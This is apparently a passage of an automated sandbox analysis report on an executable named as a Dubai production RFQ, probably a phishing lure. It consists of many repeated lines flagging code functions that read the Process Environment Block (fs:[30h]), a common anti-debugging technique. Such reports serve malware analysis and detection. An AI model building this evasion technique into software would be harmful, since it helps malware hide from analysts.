Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A22B mov eax, dword ptr fs:[00000030h]	2_2_0163A22B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A22B mov eax, dword ptr fs:[00000030h]	2_2_0163A22B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01680227 mov eax, dword ptr fs:[00000030h]	2_2_01680227
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01680227 mov eax, dword ptr fs:[00000030h]	2_2_01680227
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01680227 mov eax, dword ptr fs:[00000030h]	2_2_01680227
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01620230 mov ecx, dword ptr fs:[00000030h]	2_2_01620230
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FA200 mov eax, dword ptr fs:[00000030h]	2_2_015FA200
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168B214 mov eax, dword ptr fs:[00000030h]	2_2_0168B214
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168B214 mov eax, dword ptr fs:[00000030h]	2_2_0168B214
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0160A2E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0160A2E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0160A2E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0160A2E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0160A2E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160A2E0 mov eax, dword ptr fs:[00000030h]	2_2_0160A2E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016082E0 mov eax, dword ptr fs:[00000030h]	2_2_016082E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016082E0 mov eax, dword ptr fs:[00000030h]	2_2_016082E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016082E0 mov eax, dword ptr fs:[00000030h]	2_2_016082E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016082E0 mov eax, dword ptr fs:[00000030h]	2_2_016082E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016102F9 mov eax, dword ptr fs:[00000030h]	2_2_016102F9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016332C0 mov eax, dword ptr fs:[00000030h]	2_2_016332C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016332C0 mov eax, dword ptr fs:[00000030h]	2_2_016332C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D32C9 mov eax, dword ptr fs:[00000030h]	2_2_016D32C9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016232C5 mov eax, dword ptr fs:[00000030h]	2_2_016232C5
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FD2EC mov eax, dword ptr fs:[00000030h]	2_2_015FD2EC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FD2EC mov eax, dword ptr fs:[00000030h]	2_2_015FD2EC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F72E0 mov eax, dword ptr fs:[00000030h]	2_2_015F72E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF2AE mov eax, dword ptr fs:[00000030h]	2_2_016BF2AE
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C92AB mov eax, dword ptr fs:[00000030h]	2_2_016C92AB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016242AF mov eax, dword ptr fs:[00000030h]	2_2_016242AF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016242AF mov eax, dword ptr fs:[00000030h]	2_2_016242AF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DB2BC mov eax, dword ptr fs:[00000030h]	2_2_016DB2BC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DB2BC mov eax, dword ptr fs:[00000030h]	2_2_016DB2BC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DB2BC mov eax, dword ptr fs:[00000030h]	2_2_016DB2BC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DB2BC mov eax, dword ptr fs:[00000030h]	2_2_016DB2BC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167E289 mov eax, dword ptr fs:[00000030h]	2_2_0167E289
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FC2B0 mov ecx, dword ptr fs:[00000030h]	2_2_015FC2B0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F92AF mov eax, dword ptr fs:[00000030h]	2_2_015F92AF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01607290 mov eax, dword ptr fs:[00000030h]	2_2_01607290
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01607290 mov eax, dword ptr fs:[00000030h]	2_2_01607290
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01607290 mov eax, dword ptr fs:[00000030h]	2_2_01607290
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161C560 mov eax, dword ptr fs:[00000030h]	2_2_0161C560
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01636540 mov eax, dword ptr fs:[00000030h]	2_2_01636540
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01638540 mov eax, dword ptr fs:[00000030h]	2_2_01638540
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161E547 mov eax, dword ptr fs:[00000030h]	2_2_0161E547
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160254C mov eax, dword ptr fs:[00000030h]	2_2_0160254C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DB55F mov eax, dword ptr fs:[00000030h]	2_2_016DB55F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DB55F mov eax, dword ptr fs:[00000030h]	2_2_016DB55F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CA553 mov eax, dword ptr fs:[00000030h]	2_2_016CA553
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163F523 mov eax, dword ptr fs:[00000030h]	2_2_0163F523
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01631527 mov eax, dword ptr fs:[00000030h]	2_2_01631527
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161252B mov eax, dword ptr fs:[00000030h]	2_2_0161252B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161252B mov eax, dword ptr fs:[00000030h]	2_2_0161252B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161252B mov eax, dword ptr fs:[00000030h]	2_2_0161252B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161252B mov eax, dword ptr fs:[00000030h]	2_2_0161252B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161252B mov eax, dword ptr fs:[00000030h]	2_2_0161252B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161252B mov eax, dword ptr fs:[00000030h]	2_2_0161252B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161252B mov eax, dword ptr fs:[00000030h]	2_2_0161252B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01603536 mov eax, dword ptr fs:[00000030h]	2_2_01603536
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01603536 mov eax, dword ptr fs:[00000030h]	2_2_01603536
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642539 mov eax, dword ptr fs:[00000030h]	2_2_01642539
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FB502 mov eax, dword ptr fs:[00000030h]	2_2_015FB502
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F753F mov eax, dword ptr fs:[00000030h]	2_2_015F753F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F753F mov eax, dword ptr fs:[00000030h]	2_2_015F753F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F753F mov eax, dword ptr fs:[00000030h]	2_2_015F753F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01602500 mov eax, dword ptr fs:[00000030h]	2_2_01602500
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E507 mov eax, dword ptr fs:[00000030h]	2_2_0162E507
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163C50D mov eax, dword ptr fs:[00000030h]	2_2_0163C50D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163C50D mov eax, dword ptr fs:[00000030h]	2_2_0163C50D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov ecx, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov ecx, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AF51B mov eax, dword ptr fs:[00000030h]	2_2_016AF51B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168C51D mov eax, dword ptr fs:[00000030h]	2_2_0168C51D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01621514 mov eax, dword ptr fs:[00000030h]	2_2_01621514
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01621514 mov eax, dword ptr fs:[00000030h]	2_2_01621514
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01621514 mov eax, dword ptr fs:[00000030h]	2_2_01621514
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01621514 mov eax, dword ptr fs:[00000030h]	2_2_01621514
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01621514 mov eax, dword ptr fs:[00000030h]	2_2_01621514
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01621514 mov eax, dword ptr fs:[00000030h]	2_2_01621514
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0160B5E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0160B5E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0160B5E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0160B5E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0160B5E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160B5E0 mov eax, dword ptr fs:[00000030h]	2_2_0160B5E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A5E7 mov ebx, dword ptr fs:[00000030h]	2_2_0163A5E7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A5E7 mov eax, dword ptr fs:[00000030h]	2_2_0163A5E7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016315EF mov eax, dword ptr fs:[00000030h]	2_2_016315EF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168C5FC mov eax, dword ptr fs:[00000030h]	2_2_0168C5FC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_015FF5C7
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163C5C6 mov eax, dword ptr fs:[00000030h]	2_2_0163C5C6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016805C6 mov eax, dword ptr fs:[00000030h]	2_2_016805C6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016365D0 mov eax, dword ptr fs:[00000030h]	2_2_016365D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016885AA mov eax, dword ptr fs:[00000030h]	2_2_016885AA
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016045B0 mov eax, dword ptr fs:[00000030h]	2_2_016045B0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016045B0 mov eax, dword ptr fs:[00000030h]	2_2_016045B0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A580 mov eax, dword ptr fs:[00000030h]	2_2_0163A580
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163A580 mov eax, dword ptr fs:[00000030h]	2_2_0163A580
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01639580 mov eax, dword ptr fs:[00000030h]	2_2_01639580
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01639580 mov eax, dword ptr fs:[00000030h]	2_2_01639580
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF582 mov eax, dword ptr fs:[00000030h]	2_2_016BF582
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167E588 mov eax, dword ptr fs:[00000030h]	2_2_0167E588
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167E588 mov eax, dword ptr fs:[00000030h]	2_2_0167E588
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01632594 mov eax, dword ptr fs:[00000030h]	2_2_01632594
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0168C592 mov eax, dword ptr fs:[00000030h]	2_2_0168C592
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CA464 mov eax, dword ptr fs:[00000030h]	2_2_016CA464
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01608470 mov eax, dword ptr fs:[00000030h]	2_2_01608470
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01608470 mov eax, dword ptr fs:[00000030h]	2_2_01608470
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BF478 mov eax, dword ptr fs:[00000030h]	2_2_016BF478
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610445 mov eax, dword ptr fs:[00000030h]	2_2_01610445
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610445 mov eax, dword ptr fs:[00000030h]	2_2_01610445
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610445 mov eax, dword ptr fs:[00000030h]	2_2_01610445
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610445 mov eax, dword ptr fs:[00000030h]	2_2_01610445
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610445 mov eax, dword ptr fs:[00000030h]	2_2_01610445
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610445 mov eax, dword ptr fs:[00000030h]	2_2_01610445
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163D450 mov eax, dword ptr fs:[00000030h]	2_2_0163D450
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163D450 mov eax, dword ptr fs:[00000030h]	2_2_0163D450
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160D454 mov eax, dword ptr fs:[00000030h]	2_2_0160D454
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160D454 mov eax, dword ptr fs:[00000030h]	2_2_0160D454
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160D454 mov eax, dword ptr fs:[00000030h]	2_2_0160D454
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160D454 mov eax, dword ptr fs:[00000030h]	2_2_0160D454
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160D454 mov eax, dword ptr fs:[00000030h]	2_2_0160D454
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160D454 mov eax, dword ptr fs:[00000030h]	2_2_0160D454
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E45E mov eax, dword ptr fs:[00000030h]	2_2_0162E45E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E45E mov eax, dword ptr fs:[00000030h]	2_2_0162E45E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E45E mov eax, dword ptr fs:[00000030h]	2_2_0162E45E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E45E mov eax, dword ptr fs:[00000030h]	2_2_0162E45E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162E45E mov eax, dword ptr fs:[00000030h]	2_2_0162E45E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01689429 mov eax, dword ptr fs:[00000030h]	2_2_01689429
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01637425 mov eax, dword ptr fs:[00000030h]	2_2_01637425
